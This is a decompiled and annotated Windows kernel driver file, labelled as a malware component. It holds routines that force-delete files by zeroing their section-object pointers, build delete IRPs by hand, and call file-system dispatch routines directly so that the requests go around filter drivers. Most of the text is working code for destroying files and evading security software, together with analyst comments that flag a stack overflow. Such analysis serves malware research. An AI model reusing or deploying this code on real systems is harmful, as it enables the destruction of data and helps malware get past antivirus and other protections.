Driver-Malware-Component/2019-04-09-driver-functions.c
//////////////////////////////////////////////////////////////////
////////////////////////// FORCE DELETE FILES ////////////////////
//////////////////////////////////////////////////////////////////
/*
 * Force-delete a file given a DOS-style path ("X:\...", a1).  The file is
 * opened and deleted through hand-built IRPs sent to the base file-system
 * device (i.e. below any filter drivers) rather than through Zw*/Nt* APIs.
 * When a2 is non-zero the file object's section pointers are zeroed around
 * the delete so the file system does not refuse it as "in use".
 *
 * a1: NUL-terminated UTF-16 path; the only validation is a1[1] == ':'.
 * a2: non-zero => "force" mode (section-pointer zeroing, see below).
 * Returns an NTSTATUS-style value: the last IRP status on the open path,
 * 0xC000000D (STATUS_INVALID_PARAMETER) when a1[1] != ':', and 0xC0000001
 * (STATUS_UNSUCCESSFUL) when the IRQL is too high or the drive lookup fails.
 */
signed int __stdcall sub_401000(__int16 *a1, int a2)
{
  signed int result; // eax@2
  int v3; // eax@12
  int v4; // eax@12
  UNICODE_STRING DestinationString; // [sp+0h] [bp-23Ch]@9
  __int16 *v6; // [sp+8h] [bp-234h]@5  -- assigned below but never read
  int v7; // [sp+Ch] [bp-230h]@7
  int v8; // [sp+10h] [bp-22Ch]@7
  int v9; // [sp+14h] [bp-228h]@1      -- saved ImageSectionObject (force mode)
  int v10; // [sp+18h] [bp-224h]@1     -- saved DataSectionObject (force mode)
  __int16 *v11; // [sp+1Ch] [bp-220h]@5
  __int16 *v12; // [sp+20h] [bp-21Ch]@5
  __int16 v13; // [sp+26h] [bp-216h]@6
  int v14; // [sp+28h] [bp-214h]@9
  PVOID Object; // [sp+2Ch] [bp-210h]@9
  unsigned __int16 v16; // [sp+30h] [bp-20Ch]@1  -- first WCHAR of a 0x208-byte (260 WCHAR) path buffer
  char v17; // [sp+32h] [bp-20Ah]@1               -- remaining 0x206 bytes of that same buffer
  WCHAR SourceString; // [sp+34h] [bp-208h]@9     -- same buffer, 2 WCHARs in (i.e. just past "X:")

  // Zero the whole 0x208-byte path buffer (v16 and v17 are one contiguous region).
  v16 = 0;
  memset(&v17, 0, 0x206u);
  v10 = 0;
  v9 = 0;
  // 2 == DISPATCH_LEVEL (x86): refuse to run at or above it, since the IRP helpers below block.
  if ( (signed int)KeGetCurrentIrql() < 2 )
  {
    // 58 == ':' -- the only check on the input: it must look like "X:...".  No length check.
    if ( a1[1] == 58 )
    {
      v11 = a1;
      v12 = (__int16 *)&v16;
      v6 = (__int16 *)&v16;
      // Unbounded wide-string copy of a1 into the fixed 0x208-byte stack buffer (a loop up
      // to and including the terminating NUL).
      // SECURITY: a path of 260 or more WCHARs overruns the buffer and the locals above it
      // (Object, v14, DestinationString ...). If a1 originates from a user-mode IOCTL this is a
      // kernel stack overflow -- confirm where the caller gets a1 from.
      do
      {
        v13 = *v11;
        *v12 = v13;
        ++v11;
        ++v12;
      }
      while ( v13 );
      // v16 now holds the drive letter; sub_4016A0 (not in this listing) presumably resolves it
      // and returns two values through v7/v8 that are handed on to irpcreate_file -- confirm.
      if ( sub_4016A0(v16, &v7, &v8) )
      {
        // SourceString begins 2 WCHARs into the copy, i.e. the path with the "X:" prefix removed.
        RtlInitUnicodeString(&DestinationString, &SourceString);
        // Open through a hand-built create IRP (helper not in this listing). If the helper
        // mirrors IoCreateFile's parameter meaning the constants read as SYNCHRONIZE (0x100000),
        // FILE_ATTRIBUTE_NORMAL (128), FILE_SHARE_READ|FILE_SHARE_WRITE (3), FILE_OPEN (1) and
        // FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE (0x60) -- not verifiable from here.
        v14 = irpcreate_file(&DestinationString, 0x100000, 128, 3, 1, 96, v7, v8, (int)&Object);
        DbgPrint("IrpFileCreate returned [%08X]\n", v14);
        if ( v14 >= 0 )
        {
          if ( a2 )
          {
            DbgPrint("Force Delete ...\n");
            // (_DWORD *)Object + 5 is offset 0x14 into the FILE_OBJECT, which on 32-bit is
            // SectionObjectPointer; offsets +0 and +8 of the pointed-to struct match
            // SECTION_OBJECT_POINTERS.DataSectionObject and .ImageSectionObject.
            // Saving and zeroing both makes the file system believe the file has no
            // data/image section (not mapped, not a running executable), so the delete is
            // not rejected with STATUS_CANNOT_DELETE -- the classic "force delete" trick.
            // (Layout inferred from public 32-bit structures -- confirm against the binary.)
            v10 = **((_DWORD **)Object + 5);
            v9 = *(_DWORD *)(*((_DWORD *)Object + 5) + 8);
            **((_DWORD **)Object + 5) = 0;
            *(_DWORD *)(*((_DWORD *)Object + 5) + 8) = 0;
          }
          // Both requests target the base file-system device, i.e. below any filter drivers.
          v3 = IoGetBaseFileSystemDeviceObject(Object);
          // 128 == FILE_ATTRIBUTE_NORMAL: presumably clears read-only/hidden/system first,
          // since a read-only file cannot be marked for deletion.
          v14 = irp_set_attrib(Object, v3, 128);
          DbgPrint("IrpSetFileAttributes returned [%08X]\n", v14);
          v4 = IoGetBaseFileSystemDeviceObject(Object);
          // NOTE: the set-attributes status is overwritten here; only the delete status is returned.
          v14 = irp_file_delete((struct _FILE_OBJECT *)Object, v4);
          DbgPrint("IrpFileDelete returned [%08X]\n", v14);
          if ( a2 )
          {
            // Put the original section pointers back once the delete has been issued.
            **((_DWORD **)Object + 5) = v10;
            *(_DWORD *)(*((_DWORD *)Object + 5) + 8) = v9;
          }
          // Drop the reference taken by the create helper.
          ObfDereferenceObject(Object);
        }
        result = v14;
      }
      else
      {
        result = -1073741823; // 0xC0000001 STATUS_UNSUCCESSFUL: drive-letter lookup failed
      }
    }
    else
    {
      result = -1073741811; // 0xC000000D STATUS_INVALID_PARAMETER: a1[1] != ':'
    }
  }
  else
  {
    result = -1073741823; // 0xC0000001 STATUS_UNSUCCESSFUL: IRQL >= DISPATCH_LEVEL
  }
  return result;
}
//////////////////////////////////////////////////////////////////
/////////////// FILE DELETER VIA IRP /////////////////////////////
//////////////////////////////////////////////////////////////////
/*
 * Build and send an IRP_MJ_SET_INFORMATION request carrying a one-byte
 * FILE_DISPOSITION_INFORMATION { DeleteFile = TRUE } straight to device a2 for
 * file object a1 -- the equivalent of ZwSetInformationFile(FileDispositionInformation)
 * with the I/O manager's public entry points bypassed.
 *
 * a1: the FILE_OBJECT to mark for deletion.
 * a2: the target DEVICE_OBJECT (the decompiler typed it as int).
 * Returns the IoStatus.Status left in v4 by the completion path, or
 * 0xC000009A (STATUS_INSUFFICIENT_RESOURCES) when IoAllocateIrp fails.
 *
 * Several constants below are WDK enumerators the decompiler substituted
 * purely because their numeric values matched; they are noted in place.
 */
unsigned int __stdcall irp_delete_alloc(struct _FILE_OBJECT *a1, int a2)
{
  unsigned int result; // eax@2
  struct _KEVENT Event; // [sp+0h] [bp-28h]@1
  unsigned int v4; // [sp+10h] [bp-18h]@3  -- used as the IO_STATUS_BLOCK (Status at +0); never initialised here
  int v5; // [sp+18h] [bp-10h]@3
  int v6; // [sp+1Ch] [bp-Ch]@3
  PIRP IRP; // [sp+20h] [bp-8h]@1
  char v8; // [sp+27h] [bp-1h]@3           -- FILE_DISPOSITION_INFORMATION.DeleteFile

  KeInitializeEvent(&Event, SynchronizationEvent, 0);
  // a2+48 (0x30) is DEVICE_OBJECT.StackSize on 32-bit (confirm): allocate an uncharged
  // IRP with that many stack locations.
  IRP = IoAllocateIrp(*(_BYTE *)(a2 + 48), 0);
  if ( IRP )
  {
    IRP->MdlAddress = 0;
    // Decompiler artifact: IRP_MJ_QUERY_SECURITY == 0x14 == IRP_BUFFERED_IO (0x10) |
    // IRP_SYNCHRONOUS_API (0x04), the flags a synchronous buffered set-information
    // request normally carries -- confirm against the binary.
    IRP->Flags |= IRP_MJ_QUERY_SECURITY;
    // 0 == KernelMode: the file system will skip the buffer probing it does for UserMode callers.
    IRP->RequestorMode = 0;
    IRP->UserIosb = (PIO_STATUS_BLOCK)&v4;
    IRP->UserEvent = &Event;
    IRP->PendingReturned = 0;
    IRP->Cancel = 0;
    IRP->CancelRoutine = 0;
    IRP->Tail.Overlay.Thread = KeGetCurrThread();
    IRP->Tail.Overlay.AuxiliaryBuffer = 0;
    IRP->Tail.Overlay.OriginalFileObject = a1;
    // AssociatedIrp is a union; the decompiler chose the IrpCount member but the store is
    // really AssociatedIrp.SystemBuffer = &v8, a one-byte FILE_DISPOSITION_INFORMATION ...
    IRP->AssociatedIrp.IrpCount = (LONG)&v8;
    v8 = 1; // ... with DeleteFile = TRUE.
    // Fill the next IO_STACK_LOCATION by raw 32-bit offsets:
    //   +0   MajorFunction                         = IRP_MJ_SET_INFORMATION (6)
    //   +4   Parameters.SetFile.Length             = 1 (sizeof FILE_DISPOSITION_INFORMATION);
    //        the decompiler rendered the 1 as IRP_MJ_CREATE_NAMED_PIPE
    //   +8   Parameters.SetFile.FileInformationClass = 13 = FileDispositionInformation;
    //        rendered as IRP_MJ_FILE_SYSTEM_CONTROL, which is also 13
    //   +12  Parameters.SetFile.FileObject         = a1
    //   +20  DeviceObject                          = a2
    //   +24  FileObject                            = a1
    // Only the numeric values matter; the enumerator names are artifacts -- confirm offsets.
    v6 = IoGetNextIrpStackLocation((int)IRP);
    *(_BYTE *)v6 = IRP_MJ_SET_INFORMATION;
    *(_DWORD *)(v6 + 20) = a2;
    *(_DWORD *)(v6 + 24) = a1;
    *(_DWORD *)(v6 + 8) = IRP_MJ_FILE_SYSTEM_CONTROL;
    *(_DWORD *)(v6 + 4) = IRP_MJ_CREATE_NAMED_PIPE;
    *(_DWORD *)(v6 + 12) = a1;
    // Presumably an IoSetCompletionRoutine-style helper installing sub_401850 for
    // success/error/cancel; neither routine is in this listing -- confirm.
    sub_401920((int)IRP, (int)sub_401850, 0, 1, 1u, 1);
    // Dispatch through the private IoCallDriver replacement; a1 == 0 makes it use a2's own driver.
    v5 = sub_4015C0(0, a2, (int)IRP);
    // 259 == 0x103 == STATUS_PENDING: block (KernelMode, alertable) until the completion
    // path signals Event.
    if ( v5 == 259 )
      KeWaitForSingleObject(&Event, 0, 0, 1u, 0);
    // NOTE: v4 is read on every path, but nothing in this function writes it; it relies on the
    // completion routine filling UserIosb. If the dispatch routine fails synchronously without
    // touching UserIosb, the returned status is uninitialised stack.
    result = v4;
  }
  else
  {
    result = 0xC000009A; // STATUS_INSUFFICIENT_RESOURCES
  }
  return result;
}
////////////////////////////////////////////////////
//////////////// PROCESS IRP STACK LOCATION ////////
////////////////////////////////////////////////////
/*
 * Private re-implementation of IoCallDriver: advance the IRP to its next stack
 * location and call the chosen driver's MajorFunction handler directly.
 *
 * a1: DRIVER_OBJECT whose dispatch table to use, or 0 to take it from a2.
 *     A non-zero a1 lets the caller dispatch into a driver other than the one
 *     that owns a2 -- e.g. to skip hooked or filter dispatch routines.
 * a2: target DEVICE_OBJECT.
 * a3: the IRP.
 * Returns the dispatch routine's NTSTATUS, or 0xC0000001 (STATUS_UNSUCCESSFUL)
 * when no stack locations remain -- where IoCallDriver would instead bugcheck
 * with NO_MORE_IRP_STACK_LOCATIONS.
 *
 * All structure offsets are consistent with the public 32-bit IRP / DEVICE_OBJECT /
 * DRIVER_OBJECT layouts but are not proven by this listing -- confirm against the binary.
 */
signed int __stdcall sub_4015C0(int a1, int a2, int a3)
{
  char v3; // ST1B_1@1
  signed int result; // eax@2
  int (__stdcall *v5)(int, int); // ST10_4@5
  int v6; // ST0C_4@5
  int v7; // [sp+8h] [bp-Ch]@3

  // a3+35 (0x23) is IRP.CurrentLocation: decrement it, exactly as IoCallDriver does.
  v3 = *(_BYTE *)(a3 + 35) - 1;
  *(_BYTE *)(a3 + 35) = v3;
  // v3 is a signed char, so a location that wrapped negative is rejected too.
  if ( v3 > 0 )
  {
    v7 = IoGetNextIrpStackLocation(a3);
    // a3+96 (0x60): Tail.Overlay.CurrentStackLocation = the newly current location.
    *(_DWORD *)(a3 + 96) = v7;
    // +20 in the IO_STACK_LOCATION: DeviceObject = a2.
    *(_DWORD *)(v7 + 20) = a2;
    // Default to a2's owner: a2+8 is DEVICE_OBJECT.DriverObject.
    if ( !a1 )
      a1 = *(_DWORD *)(a2 + 8);
    // a1+56 (0x38) is DRIVER_OBJECT.MajorFunction[]; index by the stack location's MajorFunction byte.
    DbgPrint("Normal Call MJ[%d] %p\n", *(_BYTE *)v7, *(_DWORD *)(a1 + 4 * *(_BYTE *)v7 + 56));
    v5 = *(int (__stdcall **)(int, int))(a1 + 4 * *(_BYTE *)v7 + 56);
    // Control Flow Guard check the compiler emitted for the indirect call that follows.
    __guard_check_icall_fptr(v5);
    // Direct (DeviceObject, Irp) call into the dispatch routine -- IoCallDriver and its
    // bookkeeping are bypassed entirely, so only a1's own table decides who sees the IRP.
    v6 = v5(a2, a3);
    DbgPrint("FsCallDriver returned [%08X]\n", v6);
    result = v6;
  }
  else
  {
    result = -1073741823; // 0xC0000001 STATUS_UNSUCCESSFUL: no more stack locations
  }
  return result;
}